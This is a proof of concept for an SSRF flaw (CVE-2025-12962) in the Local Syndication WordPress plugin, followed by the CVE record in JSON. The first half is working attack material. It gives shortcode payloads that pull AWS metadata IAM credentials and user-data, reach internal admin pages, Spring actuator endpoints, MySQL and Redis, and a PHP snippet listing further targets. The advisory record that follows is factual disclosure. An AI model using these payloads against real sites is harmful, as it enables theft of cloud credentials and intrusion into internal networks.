CVE-2025-12962

<!-- Basic SSRF PoC to fetch AWS metadata --> [syndicate_local url='http://169.254.169.254/latest/meta-data/iam/security-credentials/'] <!-- SSRF to scan internal network --> [syndicate_local url='http://192.168.1.1/admin/login.php'] [syndicate_local url='http://10.0.0.5:8080/actuator/env'] <!-- SSRF to access internal database services --> [syndicate_local url='http://internal-mysql:3306/'] <!-- SSRF using IPv6 localhost --> [syndicate_local url='http://[::1]:6379/info'] <!-- WordPress Shortcode PHP PoC for authenticated attackers --> <?php // Add malicious shortcode to WordPress post/page as Contributor function trigger_ssrf_poc($url) { // This simulates what the vulnerable plugin does $response = wp_remote_get($url); // Vulnerable: no safe check if (is_wp_error($response)) { return 'Error: ' . $response->get_error_message(); } return wp_remote_retrieve_body($response); } // Example attack vectors $targets = [ 'http://169.254.169.254/latest/meta-data/', // AWS metadata 'http://169.254.169.254/latest/user-data/', // AWS user data 'http://192.168.1.1/', // Internal router 'http://10.0.0.1:8080/actuator/health', // Spring Boot actuator ]; ?>

{"cve": {"id": "CVE-2025-12962", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:49.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Local Syndication plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5a via the `url` parameter in the `[syndicate_local]` shortcode. This is due to the use of `wp_remote_get()` instead of `wp_safe_remote_get()` which lacks protections against requests to internal/private IP addresses and localhost. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services, scan internal networks, and access resources that should not be accessible from external networks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L64", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7774cdfd-622a-4608-9efd-273923a0d0aa?source=cve", "source": "[email protected]"}]}}